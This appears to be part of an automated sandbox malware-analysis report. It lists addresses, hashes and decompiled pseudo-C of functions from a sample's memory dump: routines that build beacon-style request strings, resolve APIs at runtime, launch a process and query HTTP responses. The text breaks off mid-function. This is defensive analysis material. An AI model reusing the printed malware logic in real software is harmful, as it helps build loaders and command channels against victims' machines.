0x02bd8757
0x02bd8758
0x02bd8758
0x00000000
0x02bd8740
0x02bd8740
0x02bd8740
0x02bd8749
0x02bd874a
0x02bd874c
0x02bd874e
0x02bd874e
0x00000000
0x02bd8740
0x02bd873e
0x02bd871a
0x02bd8721
0x02bd8721
0x02bd8723
0x00000000
0x00000000
0x02bd8725
0x02bd8726
0x02bd8729
0x02bd872b
0x00000000
0x00000000
0x00000000
0x02bd872b
0x00000000
0x02bd8721
0x02bd86a4
0x02bd86a7
0x02bd86ac
0x00000000
0x00000000
0x02bd86b5
0x02bd86b7
0x02bd86bd
0x00000000
0x00000000
0x02bd86c3
0x02bd86c9
0x00000000
0x00000000
0x02bd86cf
0x02bd86d1
0x02bd86da
0x02bd86de
0x00000000
0x00000000
0x02bd86e4
0x02bd86e7
0x02bd86e9
0x00000000
0x00000000
0x02bd86f0
0x02bd86f2
0x00000000
0x00000000
0x02bd86f4
0x02bd86f8
0x00000000
0x00000000
0x00000000
0x02bd86f8
0x00000000
0x00000000
0x00000000
0x02bd85e3
0x02bd85e3
0x02bd85e3
0x02bd85ea
0x00000000
0x00000000
0x02bd85ec
0x02bd85ed
0x02bd85ef
0x00000000
0x00000000
0x00000000
0x02bd85ef
0x02bd8617
0x02bd8619
0x00000000
0x00000000
0x02bd8629
0x02bd862b
0x02bd862d
0x00000000
0x00000000
0x02bd8633
0x02bd863a
0x02bd8666
0x02bd8666
0x02bd8668
0x02bd866a
0x02bd867e
0x02bd8680
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd866c
0x02bd866c
0x02bd866c
0x02bd8675
0x02bd8676
0x02bd8678
0x02bd867a
0x02bd867a
0x00000000
0x02bd866c
0x02bd863c
0x02bd863c
0x02bd863f
0x02bd8641
0x02bd8653
0x02bd8653
0x02bd8656
0x02bd8658
0x02bd8658
0x02bd8659
0x02bd8659
0x02bd865f
0x02bd865f
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd8643
0x02bd8643
0x02bd8643
0x02bd864a
0x00000000
0x00000000
0x02bd864c
0x02bd864c
0x02bd864d
0x00000000
0x00000000
0x00000000
0x02bd864d
0x02bd864f
0x02bd8651
0x02bd8664
0x00000000
0x00000000
0x00000000
0x02bd8664
0x00000000
0x02bd8651
0x02bd85c3
0x02bd85c6
0x02bd85c9
0x00000000
0x00000000
0x02bd85cb
0x02bd85cd
0x00000000
0x00000000
0x00000000
0x02bd85cd
0x02bd8592
0x02bd8594
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02BD8602

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: a6f0baeb8d9b326e0e77fa8c206d8078f7aaee0573a031905a4732a361f194a9
Instruction ID: 3b3569d973d083732b49c23488f10ddb0d6aa19aeccd67b7ccc248c51f72ed7b
Opcode Fuzzy Hash: a6f0baeb8d9b326e0e77fa8c206d8078f7aaee0573a031905a4732a361f194a9
Instruction Fuzzy Hash: CB61F435A006029FCB29DE38C9907E977A7FB8576AF2488E9D416CB281F731D843CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD832C Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E02BD832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E02BD8497(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E02BD8551(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E02BD843C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E02BD8497(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E02BD8533(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x02bd8330
0x02bd8331
0x02bd8332
0x02bd8335
0x02bd8337
0x02bd833a
0x02bd833b
0x02bd833d
0x02bd833e
0x02bd833f
0x02bd8342
0x02bd834c
0x02bd83fd
0x02bd8404
0x02bd840d
0x02bd8352
0x02bd8352
0x02bd8358
0x02bd835e
0x02bd8361
0x02bd8364
0x02bd8368
0x02bd836d
0x02bd8372
0x02bd83f2
0x00000000
0x02bd8374
0x02bd8374
0x02bd8380
0x02bd8382
0x02bd83dd
0x02bd83dd
0x02bd83e3
0x00000000
0x02bd8384
0x02bd8393
0x02bd8395
0x02bd8396
0x02bd8397
0x02bd839a
0x02bd839a
0x02bd839c
0x00000000
0x02bd839e
0x02bd839e
0x02bd83e8
0x02bd83a0
0x02bd83a0
0x02bd83a4
0x02bd83ac
0x02bd83b1
0x02bd83b6
0x02bd83c2
0x02bd83ca
0x02bd83d1
0x02bd83d7
0x02bd83db
0x00000000
0x02bd83db
0x02bd839e
0x02bd839c
0x00000000
0x02bd8382
0x02bd83f6
0x02bd83f6
0x02bd83f6
0x02bd8372
0x02bd8412
0x02bd8419

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 8106919a96ef32ebeed079df81ebcaef54e9c301d36625b4043c8f4df4ea0052
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: E621A7729002049BCB10EF68C8C09EBBBA6FF44360B49C1D8E9599B245E730F916CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2B91 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E02BD2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x2bda018; // 0x3dd6b064
				asm("bswap eax");
				_t70 =  *0x2bda014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x2bda010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x2bda00c; // 0x81762942
				asm("bswap eax");
				_t73 =  *0x2bda348; // 0x9dd5a8
				_t3 = _t73 + 0x2bdb5ac; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x2bda02c,  *0x2bda004, _t68);
				_t76 = E02BD467F();
				_t77 =  *0x2bda348; // 0x9dd5a8
				_t4 = _t77 + 0x2bdb575; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x2bda348; // 0x9dd5a8
					_t8 = _t148 + 0x2bdb508; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x2bda348; // 0x9dd5a8
				_t10 = _t81 + 0x2bdb89e; // 0x35b8e46
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x2bdb246; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x2bda36c; // 0x35b95b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x2bda348; // 0x9dd5a8
					_t16 = _t144 + 0x2bdb8be; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E02BD472F(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x2bda348; // 0x9dd5a8
					_t19 = _t139 + 0x2bdb8d0; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x2bda2d8, 0, _a40);
				}
				_t87 = E02BD1340();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x2bda348; // 0x9dd5a8
					_t23 = _t135 + 0x2bdb8c5; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x2bda2d8, 0, _a40);
				}
				_t166 =  *0x2bda3cc; // 0x35b9600
				_t89 = E02BD6B59(0x2bda00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x2bda2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x2bda2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x2bda2d8, _t172, _a8);
						goto L30;
					}
					E02BD2915(GetTickCount());
					_t96 =  *0x2bda3cc; // 0x35b9600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x2bda3cc; // 0x35b9600
					__imp__(_t100 + 0x40);
					_t102 =  *0x2bda3cc; // 0x35b9600
					_t168 = E02BD6675(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x2bda2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x2bd9280);
					_push(_t168);
					_t108 = E02BD7563();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x2bda2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E02BD6536( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E02BD63F6();
						L26:
						HeapFree( *0x2bda2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E02BD6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E02BD597D(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E02BD61DA(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E02BD673A(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E02BD61DA(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x02bd2b91
0x02bd2b91
0x02bd2b95
0x02bd2b9c
0x02bd2ba6
0x02bd2ba8
0x02bd2ba8
0x02bd2bb5
0x02bd2bc0
0x02bd2bc3
0x02bd2bce
0x02bd2bd1
0x02bd2bd6
0x02bd2bd9
0x02bd2bde
0x02bd2be1
0x02bd2bed
0x02bd2bfa
0x02bd2bfc
0x02bd2c02
0x02bd2c07
0x02bd2c12
0x02bd2c14
0x02bd2c17
0x02bd2c1e
0x02bd2c20
0x02bd2c29
0x02bd2c34
0x02bd2c36
0x02bd2c39
0x02bd2c39
0x02bd2c3b
0x02bd2c40
0x02bd2c40
0x02bd2c48
0x02bd2c4c
0x02bd2c52
0x02bd2c5d
0x02bd2c5f
0x02bd2c64
0x02bd2c69
0x02bd2c6c
0x02bd2c71
0x02bd2c7c
0x02bd2c7e
0x02bd2c81
0x02bd2c81
0x02bd2c83
0x02bd2c8e
0x02bd2c94
0x02bd2c97
0x02bd2c9c
0x02bd2ca7
0x02bd2ca9
0x02bd2cb0
0x02bd2cba
0x02bd2cba
0x02bd2cbc
0x02bd2cc1
0x02bd2cc7
0x02bd2cca
0x02bd2ccf
0x02bd2cd9
0x02bd2cdb
0x02bd2cea
0x02bd2cea
0x02bd2cec
0x02bd2cfa
0x02bd2cff
0x02bd2d01
0x02bd2d07
0x02bd2ee7
0x02bd2eef
0x02bd2efc
0x02bd2d0d
0x02bd2d19
0x02bd2d1f
0x02bd2d25
0x02bd2eda
0x02bd2ee5
0x00000000
0x02bd2ee5
0x02bd2d31
0x02bd2d36
0x02bd2d3f
0x02bd2d50
0x02bd2d54
0x02bd2d5d
0x02bd2d63
0x02bd2d70
0x02bd2d7d
0x02bd2d83
0x02bd2ecd
0x02bd2ed8
0x00000000
0x02bd2ed8
0x02bd2d8f
0x02bd2d95
0x02bd2d96
0x02bd2d9b
0x02bd2da1
0x02bd2ec3
0x02bd2ecb
0x00000000
0x02bd2ecb
0x02bd2dab
0x02bd2db2
0x02bd2dbc
0x02bd2dc2
0x02bd2dcc
0x02bd2dde
0x02bd2de0
0x02bd2de6
0x02bd2eff
0x02bd2eae
0x02bd2eae
0x02bd2eb3
0x02bd2ebf
0x02bd2ec1
0x00000000
0x02bd2ec1
0x02bd2df1
0x02bd2df6
0x02bd2dfc
0x02bd2e07
0x02bd2e12
0x02bd2e16
0x02bd2e1c
0x02bd2e22
0x02bd2e28
0x02bd2e2b
0x02bd2e31
0x02bd2e34
0x02bd2e39
0x02bd2e3d
0x02bd2e3d
0x02bd2e4a
0x02bd2e58
0x02bd2e5d
0x02bd2e5f
0x02bd2e65
0x02bd2e6b
0x02bd2e6d
0x02bd2e72
0x02bd2e76
0x02bd2e92
0x02bd2e92
0x02bd2e65
0x00000000
0x02bd2e4c
0x02bd2e51
0x02bd2e94
0x02bd2e98
0x02bd2ea2
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd2ea2
0x02bd2e53
0x00000000
0x02bd2e53
0x02bd2e4a

APIs

GetTickCount.KERNEL32 ref: 02BD2BA8
wsprintfA.USER32 ref: 02BD2BF5
wsprintfA.USER32 ref: 02BD2C12
wsprintfA.USER32 ref: 02BD2C34
wsprintfA.USER32 ref: 02BD2C5B
wsprintfA.USER32 ref: 02BD2C7C
wsprintfA.USER32 ref: 02BD2CA7
HeapFree.KERNEL32(00000000,?), ref: 02BD2CBA
wsprintfA.USER32 ref: 02BD2CD9
HeapFree.KERNEL32(00000000,?), ref: 02BD2CEA

Part of subcall function 02BD6B59: RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD6B75
Part of subcall function 02BD6B59: RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD6B93

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD2D19
GetTickCount.KERNEL32 ref: 02BD2D2B
RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD2D3F
RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD2D5D

Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A0
Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A8
Part of subcall function 02BD6675: strcpy.NTDLL ref: 02BD66BF
Part of subcall function 02BD6675: lstrcat.KERNEL32(00000000,00000000), ref: 02BD66CA
Part of subcall function 02BD6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66E7

StrTrimA.SHLWAPI(00000000,02BD9280,?,035B9600), ref: 02BD2D8F

Part of subcall function 02BD7563: lstrlen.KERNEL32(035B9C38,00000000,00000000,00000000,02BD3EF9,00000000), ref: 02BD7573
Part of subcall function 02BD7563: lstrlen.KERNEL32(?), ref: 02BD757B
Part of subcall function 02BD7563: lstrcpy.KERNEL32(00000000,035B9C38), ref: 02BD758F
Part of subcall function 02BD7563: lstrcat.KERNEL32(00000000,?), ref: 02BD759A

lstrcpy.KERNEL32(00000000,?), ref: 02BD2DB2
lstrcpy.KERNEL32(?,?), ref: 02BD2DBC
lstrcat.KERNEL32(?,?), ref: 02BD2DCC
lstrcat.KERNEL32(?,00000000), ref: 02BD2DD3

Part of subcall function 02BD6536: lstrlen.KERNEL32(?,00000000,035B9E40,00000000,02BD6F0A,035BA063,43175AC3,?,?,?,?,43175AC3,00000005,02BDA00C,4D283A53,?), ref: 02BD653D
Part of subcall function 02BD6536: mbstowcs.NTDLL ref: 02BD6566
Part of subcall function 02BD6536: memset.NTDLL ref: 02BD6578

wcstombs.NTDLL ref: 02BD2E76

Part of subcall function 02BD597D: SysAllocString.OLEAUT32(?), ref: 02BD59B8

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

HeapFree.KERNEL32(00000000,?), ref: 02BD2EBF
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD2ECB
HeapFree.KERNEL32(00000000,?,?,035B9600), ref: 02BD2ED8
HeapFree.KERNEL32(00000000,?), ref: 02BD2EE5
HeapFree.KERNEL32(00000000,?), ref: 02BD2EEF

Strings

Uqt, xrefs: 02BD2C88

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID: Uqt
API String ID: 1185349883-2320327147
Opcode ID: cafd58e92d7cabb135df012d71050afffa343ebf7faaf9dbdeaeac1bdc2f8019
Instruction ID: 1ea5cdd7418d4842e1f0c10f17f28cce22e90372a1c0152898019e847790b90e
Opcode Fuzzy Hash: cafd58e92d7cabb135df012d71050afffa343ebf7faaf9dbdeaeac1bdc2f8019
Instruction Fuzzy Hash: 98A19C71902210AFCB11EF64DC54EDA7BE9EF88798F450968F888D3221E732D965CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD37DF Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02BD37DF(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02BD6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02BD7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2bda300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2bda348; // 0x9dd5a8
					_t18 = _t47 + 0x2bdb706; // 0x73797325
					_t68 = E02BD127E(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2bda348; // 0x9dd5a8
						_t19 = _t50 + 0x2bdb86c; // 0x35b8e14
						_t20 = _t50 + 0x2bdb3f6; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02BD5B56();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02BD5B56();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2bda2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02BD61DA(_t70);
				goto L12;
			}

0x02bd37e7
0x02bd37e7
0x02bd37f6
0x02bd37fd
0x02bd3802
0x02bd390f
0x02bd3916
0x02bd3916
0x02bd3811
0x02bd3819
0x02bd381c
0x02bd3821
0x02bd3836
0x02bd383c
0x02bd383d
0x02bd3840
0x02bd3846
0x02bd3849
0x02bd384e
0x02bd3856
0x02bd3862
0x02bd3866
0x02bd38f6
0x02bd386c
0x02bd386c
0x02bd3871
0x02bd3878
0x02bd388c
0x02bd3890
0x02bd38df
0x02bd3892
0x02bd3893
0x02bd389a
0x02bd38b3
0x02bd38b5
0x02bd38b9
0x02bd38c0
0x02bd38da
0x02bd38c2
0x02bd38cb
0x02bd38d0
0x02bd38d0
0x02bd38c0
0x02bd38ee
0x02bd38ee
0x02bd3866
0x02bd38fd
0x02bd3906
0x02bd390a
0x00000000

APIs

Part of subcall function 02BD6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD37FB,?,?,?,?,00000000,00000000), ref: 02BD6C1E
Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD6C40
Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD6C56
Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD6C6C
Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD6C82
Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD6C98

memset.NTDLL ref: 02BD3849

Part of subcall function 02BD127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BD3862,73797325), ref: 02BD128F
Part of subcall function 02BD127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BD12A9

GetModuleHandleA.KERNEL32(4E52454B,035B8E14,73797325), ref: 02BD387F
GetProcAddress.KERNEL32(00000000), ref: 02BD3886
HeapFree.KERNEL32(00000000,00000000), ref: 02BD38EE

Part of subcall function 02BD5B56: GetProcAddress.KERNEL32(36776F57,02BD2425), ref: 02BD5B71

CloseHandle.KERNEL32(00000000,00000001), ref: 02BD38CB
CloseHandle.KERNEL32(?), ref: 02BD38D0
GetLastError.KERNEL32(00000001), ref: 02BD38D4

Strings

@MqtNqt, xrefs: 02BD38D4
Uqt, xrefs: 02BD38EE

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3075724336-3266969629
Opcode ID: ac218c005736fb0cb0ac22a3f8b224db9629e01f9dd9eb3d6d7546a2aa5e7f38
Instruction ID: 6379d5b64781d9b3a8158c1907d0fd7585c793c3871665eca272d348ea44476c
Opcode Fuzzy Hash: ac218c005736fb0cb0ac22a3f8b224db9629e01f9dd9eb3d6d7546a2aa5e7f38
Instruction Fuzzy Hash: 6F313272D41208AFDB10AFA4DC84DDEBBBDEB04354F0144A5E606E3111E7326A54CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3FA5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD3FA5(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
